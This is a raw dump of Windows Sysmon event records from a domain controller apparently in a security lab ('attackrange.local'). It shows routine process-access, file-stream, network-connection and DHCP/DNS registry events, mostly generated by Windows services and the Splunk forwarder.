14:00:03.559{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7E3-6040-0B4E-00000000AD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7E3-6040-0B4E-00000000AD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.560{5ABCFE62-E7E3-6040-0B4E-00000000AD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.340{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF3B768D1E519B15661BDCF8C9F6D26,SHA256=1C49DE5F5F7CE9086057C585E3491CE1E874D77E6FD3C9C8351607403AF5B841,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5856A9B1A8E38F698E29320A7357C9F5,SHA256=8E3C258905C07FCA76F7B3AC9A45CA66A66ED78146559813EDE8B6E310D802F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:58.958{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55237-false10.0.1.12-8000- 23542300x80000000000000002201695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:04.575{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E83AA0D859ABD69F00475861067762B1,SHA256=7B5DA7222B459306892B2541F2717DA5E065DC5D3FF3732E7BE97FEE03B26E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:04.403{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B30D958455BF903852476411D776E839,SHA256=36F82A853FFB1A1120920A5739DF2B8D407A814A2EE11DD20967ED2EDE955F57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:05.418{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F999A18125F8D2B51E95C1806EE12E,SHA256=22ED5859366AC836405ED359F7D1EB30A457EA860285A8004F529E41CECF884E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:06.840{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:06.418{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0875734BF24D47E7001D9AC81180A43F,SHA256=19FFC0B34A74D0652345E4C1A229C56A0A8E7E04F890EF7E9E8EFD8CC06ED926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.418{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2FC784C23D10BBDB58552ECDEA8C2D,SHA256=A3214664073080460958F0B7DF870BD52289291AA9406AA9B4DB14F6736F713A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1ADE4F739CCBD90BA536553D0EE409E3,SHA256=85E89D4BBC035E0291DCA210C2EE010DD25A84FD7F6E1C318D9BE71BED6A0FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:08.434{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF7FCC1EF9F20A597533DBC23CAE66A,SHA256=99AFA9BF352939FBA5B5CB86B3FEB86862C3818A76CAD0D32E71A2EC8E3EEFAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.973{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55238-false10.0.1.12-8000- 23542300x80000000000000002201716Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.450{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D66406BA38736C624C7D2C3A929672B5,SHA256=36679A1A00C085FAD3A809F318339A4B1B0E3F7F0A11E0E56B21B93A7B041038,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201715Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:04.661{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55239-false10.0.1.12-8089- 13241300x80000000000000002201714Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000002201713Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000002201712Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\AddressTypeDWORD (0x00000000) 13241300x80000000000000002201711Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\LeaseTerminatesTimeDWORD (0x6040f5f9) 13241300x80000000000000002201710Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\T2DWORD (0x6040f437) 13241300x80000000000000002201709Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\T1DWORD (0x6040eef1) 13241300x80000000000000002201708Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\LeaseObtainedTimeDWORD (0x6040e7e9) 13241300x80000000000000002201707Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\LeaseDWORD (0x00000e10) 13241300x80000000000000002201706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\DhcpServer10.0.1.1 13241300x80000000000000002201705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\DhcpSubnetMask255.255.255.0 13241300x80000000000000002201704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\DhcpIPAddress10.0.1.14 13241300x80000000000000002201703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:09.356{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{b3898c47-28d2-4a71-8bc8-47680ee6b398}\DhcpInterfaceOptionsBinary Data 23542300x80000000000000002201721Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:10.451{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A9F206E04DB78F02B9C72634B1295F2,SHA256=69AF0183B61BE594AC5D6E15440FC0A1AEE153960F3B77492A9E8597E83B2BC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201720Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:10.419{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3FA70D250D9A0602F98840F42EE3D9D,SHA256=619754700FF469AA9ADB98F4EFA1B650D7D51958CBFECB2D508E213CF8B12A50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201719Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:10.060{5ABCFE62-842D-603E-0B00-00000000AD01}6324216C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002201718Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.998{5ABCFE62-842F-603E-0F00-00000000AD01}2966188C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201717Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.998{5ABCFE62-842F-603E-0F00-00000000AD01}2966188C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201742Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:11.638{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707EEF8FA2575CB3ADA18BF21AFDBADF,SHA256=67A6A31C3EE31A5CB90CF7747ED6595B8B29343927268CFC2A1C764B0BBBCA10,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201741Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.897{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55240-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002201740Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.897{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55240-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002201739Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.197{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9820:3fb3:1e2:ffff-53940-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000002201738Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.196{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local53940-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000002201737Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:07.192{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-228.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.us-west-2.compute.internal67bootps 23542300x80000000000000002201736Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:11.419{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F07DA37FE09FF15B446981261671EDA,SHA256=FF8629314AC4AFE65E7BAA0FC9468B3AD36B0DF9E7323D87D47ED4B2D53946DE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002201735Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002201734Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002201733Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002201732Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\FlagsDWORD (0x00000002) 13241300x80000000000000002201731Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\TtlDWORD (0x000004b0) 13241300x80000000000000002201730Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\SentPriUpdateToIpBinary Data 13241300x80000000000000002201729Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\SentUpdateToIpBinary Data 13241300x80000000000000002201728Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\DnsServersBinary Data 13241300x80000000000000002201727Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\HostAddrsBinary Data 